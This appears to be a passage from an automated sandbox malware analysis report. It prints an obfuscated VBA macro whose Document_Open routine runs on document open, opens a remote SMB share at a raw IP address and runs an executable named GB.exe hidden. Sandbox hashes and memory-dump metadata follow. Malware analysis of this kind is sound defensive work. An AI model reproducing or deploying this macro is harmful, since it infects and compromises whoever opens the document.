                                                            Subroutine

                                                            Document_OpenAPIs: 6, Strings: 3, Number of lines: 8, Relevance: 24.008

                                                            APIsMeta Information

                                                            Shell

                                                            		Shell("explorer.exe "\\89.23.98.22\LN\"",1) -> 3292

                                                            vbNormalFocus

                                                            Part of subcall function RunExecutable@ThisDocument: Shell

                                                            Part of subcall function RunExecutable@ThisDocument: vbNormalFocus

                                                            Part of subcall function RunExecutable@ThisDocument: Shell

                                                            Part of subcall function RunExecutable@ThisDocument: vbHide

                                                            StringsDecrypted Strings
                                                            "\\89.23.98.22\LN\"
                                                            "GB.exe"
                                                            "explorer.exe """
                                                            LineInstructionMeta Information
                                                            9

                                                            Private Sub Document_Open()

                                                            10

                                                            Dim FASFASFHBNVNVB as String

                                                            executed
                                                            11

                                                            Dim ireowrppqwcxva as String

                                                            14

                                                            FASFASFHBNVNVB = "\\89.23.98.22\LN\"

                                                            15

                                                            ireowrppqwcxva = "GB.exe"

                                                            18

                                                            Call Shell("explorer.exe """ & FASFASFHBNVNVB & """", vbNormalFocus)

                                                            Shell("explorer.exe "\\89.23.98.22\LN\"",1) -> 3292

                                                            vbNormalFocus

                                                            executed
                                                            21

                                                            RunExecutable

                                                            22

                                                            End Sub

                                                            Reset < >

                                                              Executed Functions

                                                              Function 000007FE895F31CD Relevance: 6.7, Strings: 5, Instructions: 416COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.392287856.000007FE895F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE895F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_7fe895f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6<$6<$r6<$r6<$r6<
                                                              • API String ID: 0-3676009374
                                                              • Opcode ID: ed184a11ac3c8c0898aa023dae6d367a80d71b1431697b5acfc5e7bfd282a91b
                                                              • Instruction ID: 2bafd14e7ba33c0b4155f67661162a3d5a6cc115a9fbdf7a2a2666fbd5bb011a
                                                              • Opcode Fuzzy Hash: ed184a11ac3c8c0898aa023dae6d367a80d71b1431697b5acfc5e7bfd282a91b
                                                              • Instruction Fuzzy Hash: 8FC1293090CAC94FE796E72C84586B97FE1EF5A394F1901EBD04EC72A3DA24AC55C361
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000007FE895F614A Relevance: 2.7, Strings: 2, Instructions: 214COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.392287856.000007FE895F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE895F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_7fe895f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 88n$Xhu
                                                              • API String ID: 0-82906670
                                                              • Opcode ID: 489144c31ab926f70acfee83fd425bc4b5f811a1ea26bbb5df032282985f0d8d
                                                              • Instruction ID: db302215883f9871ad856d9026ec37ccbc36c1d6f4c8051291371597dd057a23
                                                              • Opcode Fuzzy Hash: 489144c31ab926f70acfee83fd425bc4b5f811a1ea26bbb5df032282985f0d8d
                                                              • Instruction Fuzzy Hash: E2513721A0EBD90FEB57A32858246E97FA1EF97360F1901EBD08DC71E3D914AD15C3A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000007FE89523A9D Relevance: 1.6, Strings: 1, Instructions: 351COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.392199959.000007FE89520000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89520000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_7fe89520000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6<
                                                              • API String ID: 0-4042678817
                                                              • Opcode ID: 19c7a3ea8886c32742ffd94862a13413f6482869599a5627025c8e89c0857b5c
                                                              • Instruction ID: a6e4bd9a271e302de392222570b061fd18beba992b82c8b96c574f1a9bfdf5c6
                                                              • Opcode Fuzzy Hash: 19c7a3ea8886c32742ffd94862a13413f6482869599a5627025c8e89c0857b5c
                                                              • Instruction Fuzzy Hash: 6EC15030A08A4D8FDF85EF98D455BEDBBA1FF69740F14415AD40DD72A6CA34E881CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000007FE895F7F2D Relevance: .5, Instructions: 454COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.392287856.000007FE895F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE895F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_7fe895f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 704d7d9054c1211ad4f09d58a71c9e5cccdff20dfdd6aeafc283760c193e2bc2
                                                              • Instruction ID: 7be87c9d5ef4ca641665d8266f419cbf1f32e4bf3b64af9f65aa7e170a9123a7
                                                              • Opcode Fuzzy Hash: 704d7d9054c1211ad4f09d58a71c9e5cccdff20dfdd6aeafc283760c193e2bc2
                                                              • Instruction Fuzzy Hash: B7D1373180EBC91FD357A7389814AB67FA5EF47660F0901EBD08DC70A3D618A956C3B2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000007FE895F6A52 Relevance: .4, Instructions: 414COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.392287856.000007FE895F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE895F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_7fe895f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2e71295e7504435c030acbfbeeee75d758ebb9a52006f851adae6e1ba9b4856d
                                                              • Instruction ID: ea63a8dc7e6af4821cd53dc6a980a771ca130a5bf593c4c48744a0380e79c9b2
                                                              • Opcode Fuzzy Hash: 2e71295e7504435c030acbfbeeee75d758ebb9a52006f851adae6e1ba9b4856d
                                                              • Instruction Fuzzy Hash: 69C14530A1DACD0FE75AA72C54146BA7FA1FF46354F1811FAE48EC71A3CA18AC52C361
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000007FE895F7FC0 Relevance: .2, Instructions: 188COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.392287856.000007FE895F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE895F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_7fe895f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be1dce9fb885aa2bc2550a0a8660c2c4e5eeb4c606f525cc14c3e8b93ffbc2c5
                                                              • Instruction ID: 566ad85b49fa03e324f6c56c9323c00807f3f9181d9f2da1b9dbd3615bf78f49
                                                              • Opcode Fuzzy Hash: be1dce9fb885aa2bc2550a0a8660c2c4e5eeb4c606f525cc14c3e8b93ffbc2c5
                                                              • Instruction Fuzzy Hash: E8511422D0DBCA0FE796A72C4854B7A7FE1EF46660F1911EFC08EC71A3D614AC158362
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 000007FE895F00DD Relevance: 13.0, Strings: 9, Instructions: 1753COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.392287856.000007FE895F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE895F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_7fe895f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6<$(UE$(UE$(UE$(UE$(UE$(UE$r6<$r6<
                                                              • API String ID: 0-1347658969
                                                              • Opcode ID: fe6ccea66a3997334ff4a5a31e8d8a3fbfc37e035eadb11ce04b6d416e3917d4
                                                              • Instruction ID: 945f3290f490aa602630aaf9a8b539be6a9045d3eef8eab9261c0b9774479760
                                                              • Opcode Fuzzy Hash: fe6ccea66a3997334ff4a5a31e8d8a3fbfc37e035eadb11ce04b6d416e3917d4
                                                              • Instruction Fuzzy Hash: DDB21520A0DBC94FE75AA73C58242B97FE1EF47264F1901EBD08EC75A3D518AC56C361
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000007FE895F2439 Relevance: 6.1, Strings: 4, Instructions: 1145COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.392287856.000007FE895F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE895F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_7fe895f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: |$*$[Y$[Y
                                                              • API String ID: 0-1633788789
                                                              • Opcode ID: 21e6fcf3e49059e5ab974d230c143f061f970c3a3b14f4371a7c07def178f81b
                                                              • Instruction ID: 3096f5c36e99487b050e8edb0f12f3e910b5a2d19dcd61c561f6fef6f34f2ff6
                                                              • Opcode Fuzzy Hash: 21e6fcf3e49059e5ab974d230c143f061f970c3a3b14f4371a7c07def178f81b
                                                              • Instruction Fuzzy Hash: 4472D020A0EBC94FE74BA73C68646B57FE1EF57254B1900EBD08EC71A3D9189C56C361
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%